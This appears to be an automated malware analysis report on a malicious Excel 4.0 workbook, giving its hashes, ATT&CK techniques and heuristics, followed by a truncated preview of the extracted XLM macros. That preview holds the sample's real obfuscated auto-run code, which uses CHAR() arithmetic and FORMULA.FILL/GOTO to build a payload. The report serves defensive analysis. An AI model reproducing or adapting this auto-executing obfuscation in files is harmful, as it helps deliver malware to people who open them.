Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e64664375b1615bd…

MALICIOUS

Office (OLE)

Size: 169.5 KB
Created: 2020-05-13 12:29:29
Authoring application: Microsoft Excel
First seen: 2020-09-07
MD5: fb37a1e677e415974f090fc45314dfe2
SHA-1: c1d0976389ed526830420bbf93bd544b741f064e
SHA-256: e64664375b1615bd87764e8445414feddb0224e2a81230024eb344900783611f
Risk Score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution

The workbook contains Excel 4.0 (XLM) macros with an Auto_Open defined name, so the macro sheet runs as soon as the file is opened. Critical heuristics flag dangerous XLM formula APIs, including RUN, which indicates an attempt to execute arbitrary code. The macro assembles strings from CHAR() calls over arithmetic on scattered numeric cells (visible in the FORMULA.FILL entries of the extracted listing), most likely to build a command or payload at run time.

Heuristics (3)

  • [critical] OLE_XLM_AUTOOPEN_DEFINEDNAME: Excel 4.0 Auto_Open defined name
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • [critical] OLE_XLM_DANGEROUS_FN: XLM Auto_Open with dangerous formula APIs
    The Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry together with dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • [medium] OLE_XLM_AUTOOPEN: Excel 4.0 (XLM) macro sheet present
    The workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 129349 bytes
SHA-256: 2dc0d98bec8d73bfc6b8c14a230be3f6086a007b417c048af22e32023fa457ec
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!DS17333 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,IF3,"",-0.31437125748502992018
'  Sheet,FC98,"",17.89898989898989967173
'  Sheet,ER114,"",0.71428571428571430157
'  Sheet,DM140,"",-431.00000000000000000000
'  Sheet,FS208,"",1367.00000000000000000000
'  Sheet,IS271,"",2.00404858299595156623
'  Sheet,O299,"",-279.00000000000000000000
'  Sheet,IE342,"",-0.50000000000000000000
'  Sheet,GN352,"",-2.01724137931034475102
'  Sheet,DJ356,"",-2.55844155844155851653
'  Sheet,EO356,"",414.00000000000000000000
'  Sheet,IY357,"",-23.60001953124999829470
'  Sheet,BF378,"",-41.60003906250000227374
'  Sheet,JJ428,"",4.10144927536231840293
'  Sheet,JE460,"",4.04347826086956541047
'  Sheet,JS546,"",-377.20031249999999545253
'  Sheet,ED550,"",0.95141700404858298157
'  Sheet,DK553,"",273.00000000000000000000
'  Sheet,JK572,"",-506.00000000000000000000
'  Sheet,M679,"",1681.00000000000000000000
'  Sheet,HE701,"",13.00000000000000000000
'  Sheet,GX713,"",-24.96001953125000127898
'  Sheet,DQ775,"",1.13360323886639680069
'  Sheet,EG802,"",0.26855123674911662857
'  Sheet,BJ824,"",-5.47540983606557407626
'  Sheet,IU901,"",-19.00000000000000000000
'  Sheet,FA968,"",-0.22335025380710660237
'  Sheet,GC993,"",-538.00000000000000000000
'  Sheet,CD1000,"FORMULA.FILL(CHAR(EP44466*FD60927)&CHAR(EP44466/FM5895)&CHAR(FJ41569*EY9562)&CHAR(IX30255+DN23387)&CHAR(BD47887+DD9479)&CHAR(GB37214/Q56759)&CHAR(DU55636-IX55375)&CHAR(BD47887-K38992)&CHAR(BD47887/EH17998)&CHAR(DU55636/BO58740)&CHAR(DT47650+V24291)&CHAR(IN45982-J26248)&CHAR(DU55636+BJ37680)&CHAR(DU55636+II7611)&CHAR(IX30255-S61646)&CHAR(DT47650*FM20739)&CHAR(DU55636/DD21989)&CHAR(J62209/EN30872)&CHAR(GB37214/DH51096)&CHAR(IN45982*HZ50302)&CHAR(GB37214/CL32245)&CHAR(DT47650-JR32585)&CHAR(FJ41569-HH31651)&CHAR(FJ41569*CW28529),GQ48262)",""
'  Sheet,CD1001,GOTO(GC10480),""
'  Sheet,FD1007,"",-0.30239520958083832003
'  Sheet,IX1043,"",-0.17730496453900709830
'  Sheet,IL1049,"",0.19081272084805653289
'  Sheet,CA1091,"",506.00000000000000000000
'  Sheet,DU1111,"FORMULA.FILL(CHAR(FJ41569+DZ31429)&CHAR(EP44466*ED26199)&CHAR(DT47650/IY14638)&CHAR(EP21599-JB18609)&CHAR(EP21599/GN352)&CHAR(DT47650+FP25584)&CHAR(EP21599-FG34024)&CHAR(DU55636+ED44414)&CHAR(EP44466+R41561)&CHAR(DT47650-EQ3052)&CHAR(J62209/BW45988)&CHAR(IX30255*EL35537)&CHAR(DU55636/EQ53185)&CHAR(EP21599+ID11354)&CHAR(DT47650+FE1432)&CHAR(EP21599/JN65161)&CHAR(GB37214*JH63377)&CHAR(FJ41569/IB1599)&CHAR(EP44466*HW32639)&CHAR(BD47887+JS22956)&CHAR(GB37214/EQ28643)&CHAR(J62209*BT48142)&CHAR(IN45982-GG13869)&CHAR(J62209+JM6492)&CHAR(DT47650+DK46263)&CHAR(EP44466/GK58820)&CHAR(EP44466+BR6568)&CHAR(EP21599-CP34574)&CHAR(EP44466-CB24203)&CHAR(EP21599/HF42662)&CHAR(IX30255-HF46330)&CHAR(GB37214-JE42856)&CHAR(J62209*CS61828)&CHAR(IX30255-JG33187)&CHAR(DT47650/BX24121)&CHAR(EP21599/JB31158)&CHAR(GB37214*V9562)&CHAR(DT47650*CL8238)&CHAR(IX30255+IX6383)&CHAR(FJ41569/DP59289)&CHAR(BD47887+FM27446)&CHAR(BD47887+DV47781)&CHAR(FJ41569/N10602)&CHAR(IN45982+JJ6955)&CHAR(DT47650+FV53977)&CHAR(FJ41569*BO49218)&CHAR(EP21599*IT40560)&CHAR(FJ41569/EY58544)&CHAR(EP44466/FS35436)&CHAR(IN45982+FL23875)&CHAR(EP21599-J22533)&CHAR(BD47887-W55666)&CHAR(DT47650+GG27958)&CHAR(IX30255/DB54336)&CHAR(IX30255-K48302)&CHAR(GB37214*FV43008)&CHAR(DT47650+BI49146)&CHAR(FJ41569/GR30896)&CHAR(J62209+CL3635)&CHAR(GB37214/HH53127)&CHAR(DU55636/DV32463)&CHAR(DU55636/EO59981)&CHAR(BD47887*IH33168)&CHAR(DT47650+CQ34113),JF16297)",""
'  Sheet,DU1112,GOTO(EO37126),""
'  Sheet,CE1129,"",-357.00000000000000000000
'  Sheet,D1132,"",14.56730769230769162448
'  Sheet,CS1138,"",289.00000000000000000000
'  Sheet,CP1146,"",0.23225806451612904246
'  Sheet,BF1187,GOTO(G
... (truncated)